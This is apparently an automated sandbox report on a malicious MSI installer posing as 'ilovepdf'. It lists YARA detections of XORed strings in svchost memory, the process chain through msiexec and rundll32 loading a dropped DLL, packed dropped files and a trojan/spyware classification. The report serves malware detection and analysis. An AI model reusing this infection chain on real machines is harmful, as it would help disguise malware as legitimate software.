Source: 24.2.svchost.exe.1dc51fb0000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 37.0.svchost.exe.1afba170000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 14.0.svchost.exe.24b7d0d0000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 20.0.svchost.exe.1d91aad0000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 00000014.00000003.340502864.000001D91AA60000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 00000015.00000003.343737038.000002F2C5B90000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 0000001E.00000003.383962907.000001BE5C730000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 00000022.00000000.397199381.00000202B28F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 0000001D.00000003.379846771.0000022F12180000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 00000025.00000000.402119778.000001AFBA170000.00000040.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 00000026.00000002.829615785.0000025C96C80000.00000040.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 00000019.00000003.363362333.000002216B840000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 00000010.00000002.814263097.0000012E17674000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 00000018.00000002.815503783.000001DC51FB0000.00000040.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 0000001F.00000000.389374530.0000021C23140000.00000040.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 00000010.00000003.423845789.0000012E1768F000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 00000010.00000003.341269563.0000012E17682000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 00000025.00000002.820529720.000001AFBA170000.00000040.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 00000015.00000002.823826621.000002F2C5C00000.00000040.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 00000013.00000000.337739160.00000233426D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 00000014.00000002.813792020.000001D91AAD0000.00000040.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 00000010.00000003.423609117.0000012E1768F000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 0000000D.00000002.415787297.0000000004D00000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 0000000E.00000003.327914667.0000024B7D060000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 00000010.00000003.428213354.0000012E1768F000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 00000017.00000002.815819484.0000028621CD0000.00000040.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 00000013.00000003.337258636.0000023342660000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 0000001E.00000000.384736630.000001BE5CD40000.00000040.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 0000001F.00000003.387366099.0000021C22B80000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 0000001B.00000002.832381229.000002743A320000.00000040.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 00000014.00000000.341208175.000001D91AAD0000.00000040.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 0000001C.00000002.813715548.000001111AC00000.00000040.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 00000026.00000003.406745863.0000025C96370000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 00000016.00000003.347514859.00000222CAAB0000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 00000010.00000003.425960077.0000012E1768F000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 0000001B.00000000.373121190.000002743A320000.00000040.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 00000016.00000002.815078501.00000222CAB20000.00000040.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 00000010.00000003.422182454.0000012E1768F000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 00000011.00000000.334220088.00000204F3380000.00000040.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 0000001B.00000003.369691335.000002743A2B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 00000017.00000003.351653681.0000028621C60000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 00000010.00000002.818890783.0000012E17800000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 00000025.00000003.400991197.000001AFBA100000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 00000016.00000000.348676580.00000222CAB20000.00000040.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 0000001F.00000002.812231248.0000021C23140000.00000040.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 00000015.00000000.344698282.000002F2C5C00000.00000040.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 00000011.00000002.535149996.00000204F3380000.00000040.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 0000000E.00000000.328311763.0000024B7D0D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 0000001C.00000000.376992650.000001111AC00000.00000040.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 0000001C.00000003.376362360.000001111A990000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 0000001D.00000002.816236528.0000022F12740000.00000040.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 00000018.00000000.360038212.000001DC51FB0000.00000040.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 00000011.00000003.332207196.00000204F3310000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 00000022.00000002.818183114.00000202B28F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 0000001E.00000002.817922653.000001BE5CD40000.00000040.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 00000019.00000002.819987063.000002216B8B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 00000018.00000003.358956520.000001DC51F40000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 00000022.00000003.395183978.00000202B2880000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 00000010.00000003.347751954.0000012E17682000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 00000010.00000002.831136310.0000012E1A230000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 00000010.00000002.831136310.0000012E1A230000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 0000000E.00000002.813201421.0000024B7D0D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 00000019.00000000.364403941.000002216B8B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 00000026.00000000.409308294.0000025C96C80000.00000040.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 00000013.00000002.814492712.00000233426D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 0000001D.00000000.380584076.0000022F12740000.00000040.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 00000010.00000002.822239151.0000012E17870000.00000040.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 00000010.00000003.422945945.0000012E1768F000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 00000017.00000000.353917574.0000028621CD0000.00000040.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 00000010.00000003.422081412.0000012E1768F000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: C:\Program Files (x86)\ilovepdf\is-93C0J.tmp, type: DROPPEDMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: C:\Windows\System32\msiexec.exeFile deleted: C:\Windows\Installer\MSIFBC3.tmpJump to behavior
Source: C:\Windows\Installer\MSIFBC3.tmpCode function: 10_2_004AF110 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\3cf0a5.msiJump to behavior
Source: C:\Windows\System32\svchost.exeCode function: String function: 0000012E178BB6B8 appears 32 times
Source: C:\Windows\System32\svchost.exeCode function: String function: 0000012E178BB6A8 appears 40 times
Source: C:\Windows\System32\svchost.exeCode function: String function: 0000012E198530B0 appears 33 times
Source: C:\Windows\System32\svchost.exeCode function: String function: 0000024B7D11B6A8 appears 39 times
Source: C:\Windows\System32\svchost.exeCode function: String function: 00000204F33CB848 appears 39 times
Source: C:\Windows\System32\svchost.exeCode function: String function: 0000024B7D11B6B8 appears 32 times
Source: C:\Windows\System32\svchost.exeCode function: String function: 0000012E19856620 appears 53 times
Source: C:\Windows\System32\svchost.exeCode function: String function: 0000012E19833D40 appears 38 times
Source: C:\Windows\System32\svchost.exeCode function: String function: 0000024B7D11B848 appears 39 times
Source: C:\Windows\System32\svchost.exeCode function: String function: 0000012E19834D50 appears 129 times
Source: C:\Windows\System32\svchost.exeCode function: String function: 00000204F33CB6A8 appears 39 times
Source: C:\Windows\System32\svchost.exeCode function: String function: 00000204F33CB6B8 appears 32 times
Source: C:\Windows\System32\svchost.exeCode function: String function: 0000012E19834000 appears 149 times
Source: C:\Windows\System32\svchost.exeCode function: String function: 0000012E178BB848 appears 39 times
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpCode function: String function: 0060C688 appears 31 times
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpCode function: String function: 00615D14 appears 36 times
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpCode function: String function: 005DD7A8 appears 40 times
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpCode function: String function: 005F4B90 appears 48 times
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpCode function: String function: 005F4E74 appears 61 times
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpCode function: String function: 00615A90 appears 37 times
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04EC6740: GetModuleHandleA,GetProcAddress,CreateFileA,DeviceIoControl,CloseHandle,
Source: MSIFBC3.tmp.10.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: is-JDQA9.tmp.11.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: 6rfyiAq0nM.msiBinary or memory string: OriginalFileName vs 6rfyiAq0nM.msi
Source: is-93C0J.tmp.11.drStatic PE information: Section: UPX1 ZLIB complexity 0.990987760073
Source: is-30MA7.tmp.11.drStatic PE information: Section: UPX1 ZLIB complexity 0.990885780988
Source: is-8KFAQ.tmp.11.drStatic PE information: Section: UPX1 ZLIB complexity 0.991569422468
Source: is-UKPSI.tmp.11.drStatic PE information: Section: UPX1 ZLIB complexity 0.991049810131
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpFile created: C:\Users\user\AppData\Local\ProgramsJump to behavior
Source: classification engineClassification label: mal74.troj.spyw.evad.winMSI@10/39@2/5
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpFile read: C:\Program Files (x86)\desktop.iniJump to behavior
Source: C:\Windows\Installer\MSIFBC3.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Windows\Installer\MSIFBC3.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04EC3710 OpenSCManagerW,OpenServiceW,QueryServiceStatus,StartServiceW,CloseServiceHandle,CloseServiceHandle,
Source: 6rfyiAq0nMJoe Sandbox Cloud Basic: Detection: clean Score: 0Perma Link
Source: C:\Windows\Installer\MSIFBC3.tmpCode function: 10_2_004AF9F0 FindResourceW,SizeofResource,LoadResource,LockResource,
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpFile created: C:\Program Files (x86)\ilovepdfJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganization
Source: 6rfyiAq0nM.msiVirustotal: Detection: 31%
Source: 6rfyiAq0nM.msiReversingLabs: Detection: 35%
Source: C:\Windows\Installer\MSIFBC3.tmpKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknownProcess created: C:\Windows\System32\msiexec.exe 'C:\Windows\System32\msiexec.exe' /i 'C:\Users\user\Desktop\6rfyiAq0nM.msi'
Source: unknownProcess created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\Installer\MSIFBC3.tmp C:\Windows\Installer\MSIFBC3.tmp
Source: C:\Windows\Installer\MSIFBC3.tmpProcess created: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp 'C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp' /SL5='$9025C,6374824,780800,C:\Windows\Installer\MSIFBC3.tmp'
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpProcess created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rUNdLl32.Exe' 'C:\Program Files (x86)\ilovepdf\sqlite.dll',global
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k SystemNetworkService
Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\Installer\MSIFBC3.tmp C:\Windows\Installer\MSIFBC3.tmp
Source: C:\Windows\Installer\MSIFBC3.tmpProcess created: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp 'C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp' /SL5='$9025C,6374824,780800,C:\Windows\Installer\MSIFBC3.tmp'
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpProcess created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rUNdLl32.Exe' 'C:\Program Files (x86)\ilovepdf\sqlite.dll',global
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k SystemNetworkService
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32
Source: C:\Windows\Installer\MSIFBC3.tmpCode function: 10_2_004AF110 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04ECAA70 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,
Source: C:\Windows\System32\svchost.exeCode function: 14_2_0000024B7D0EDA60 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E1788DA60 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F339DA60 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\TEMP\~DFAE8A96F5E4660E33.TMPJump to behavior
